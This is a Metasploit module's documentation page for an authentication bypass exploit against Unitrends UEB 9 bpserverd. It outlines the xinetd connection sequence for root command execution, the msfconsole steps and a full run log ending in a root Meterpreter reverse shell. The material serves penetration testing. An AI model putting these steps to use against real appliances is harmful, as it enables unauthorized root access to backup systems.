CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/misc/ueb9_bpserverd.md
Views: 1904

Vulnerable Application

Unitrends UEB 9 bpserverd authentication bypass RCE

This exploit uses roughly the same process to gain root execution as does the apache user on the Unitrends appliance. The process is something like this:

  1. Connect to xinetd process (it's usually running on port 1743)

  2. This process will send something like: ?A,Connect36092

  3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example)

  4. send a specially crafted packet to xinetd, containing the command to be executed as root

  5. Receive command output from the connection to port 36092

  6. Close both connections

Verification Steps

  1. use exploit/linux/misc/ueb9_bpserverd

  2. set lhost [IP]

  3. set rhost [IP]

  4. exploit

  5. A meterpreter session should have been opened successfully

Scenarios

UEB 9.1 on CentOS 6.5

msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress -  26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress -  53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress -  80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >